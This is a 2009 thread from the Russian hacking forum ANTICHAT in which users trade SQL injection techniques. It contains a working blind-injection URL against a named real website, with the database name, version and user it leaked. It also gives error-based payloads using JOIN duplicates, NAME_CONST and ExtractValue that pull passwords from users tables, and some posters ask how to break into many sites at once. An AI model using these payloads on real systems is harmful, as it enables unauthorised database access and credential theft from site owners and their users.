ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.12.2009, 02:07
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами: 9837719

Репутация: 466
По умолчанию

поиграйся с флагами nmap! а как это через веб на ssh?
 
Ответить с цитированием

  #2  
Старый 31.12.2009, 05:34
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами: 10024314

Репутация: 739
По умолчанию

зависит от настроек удаленного доступа
 
Ответить с цитированием

  #3  
Старый 31.12.2009, 07:49
krypt3r
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами: 10021597

Репутация: 905


По умолчанию

Значит, юзера user@% в БД не существует
 
Ответить с цитированием

  #4  
Старый 31.12.2009, 11:17
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами: 9427499

Репутация: 22
По умолчанию

http://webantenne.com/radio_player_1.php?id=999'

Ошибка вылазит, но раскрутить не могу Оо
 
Ответить с цитированием

  #5  
Старый 31.12.2009, 13:23
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Код:
http://webantenne.com/radio_player_1.php?id=-999+or+1=1+and+substring(version(),1,1)=3

----------------------------------
Blind MYsql system information:
----------------------------------
database(): db100436_1
version(): 3.23.58-log
user(): db100436_1@localhost

POST-method granted
 
Ответить с цитированием

  #6  
Старый 31.12.2009, 17:24
DeluxeS
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
С нами: 8829763

Репутация: 131
По умолчанию

1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(

2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
 
Ответить с цитированием

  #7  
Старый 31.12.2009, 17:31
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами: 9223466

Репутация: 3171


По умолчанию

Цитата:
Сообщение от DeluxeS  
1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(

2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
Ох я ебал.Как в болталке тролить так мы в первое рыло,а как статьи почитать религия не позволяет?
Для каждого случая,отдельная диагностика,где то кавычка,где-то скобка.И нельзя вывести точную статистику сколько сайтов мы взломаем из 100, "благоприятные обстоятельства" нужны
 
Ответить с цитированием

  #8  
Старый 31.12.2009, 19:32
.Life
Banned
Регистрация: 26.12.2009
Сообщений: 152
С нами: 8618486

Репутация: 0
По умолчанию

Сори за поднятие этой темы ,обясните кто нить в деталях о скуле с использованием ExtractValue и name_const и -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
 
Ответить с цитированием

  #9  
Старый 31.12.2009, 20:09
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

Цитата:
Сообщение от .Life  
Сори за поднятие этой темы ,обясните кто нить в деталях о скуле с использованием ExtractValue и name_const и -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
Запрос JOIN объединяет 2 таблички и колонки этих двух табличек. Т.е. допустим если у нас есть 2 таблички и которых есть колонки id, то у нас выводиться "дубликат error 'и тут допустим название колонки дупликата'"
пример: -1+and+1=(select+*+from+(select+*+from+codes+a+JOIN +codes+b)c)--
Выведет в дупликат эроре название колонки 1. Допустим она называется id, с таблички codes,
чтобы вывести вторую колонку, исключаем первую функией USING.
пример: пример: -1+and+1=(select+*+from+(select+*+from+codes+a+JOIN +codes+b+USING(id))c--
Если же добавить к запросу ещё и name_const, то можно выводить не только колонки, но и данные.
например: -1+and+1=(select+*+from+(select+*+from+(SELECT+NAME _CONST((SELECT
password+FROM+users+LIMIT+1),1)x)+a+JOIN+(SELECT+N AME_CONST((SELECT
passwd+FROM+users+LIMIT+1),1)x)+b+USING(id))c--
На счёт ExtractValue, то это только для версии от 5.1.5 вроде..Т.е. функция EXTRACTVALUE извлекает значения элемента из документа XML, но заместь документа, ты вписуешь подзапрос. Допустим Extractvalue((version()),1)
Про дубликаты, есть отличная статья тут, потому как все детали описывать долговато..
h_ttp://www.xakep.ru/post/50554/
или ещё информация об этом, тут.
h_ttp://bugs.mysql.com/bug.php?id=8652

Если где синтаксическая ошибка, прийду исправлю, а то спешу по делам.

Последний раз редактировалось v1d0qz; 12.01.2010 в 02:21..
 
Ответить с цитированием

  #10  
Старый 31.12.2009, 22:21
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию

Цитата:
Сообщение от Strilo4ka  
И это ошыбки не синтаксические а во времени выпролнения запроса надо еще было добавить и про пост квазара вспомнить который работает у всех версиях мускула
Что серьёзно?)) Уважаемый, я вообще-то написал о синтаксических ошибках в моём тексте Ну да ладно. Видимо кто-то уже набрался не дождавшись нового года))

Последний раз редактировалось v1d0qz; 31.12.2009 в 22:34..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 13 (пользователей: 0 , гостей: 13)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.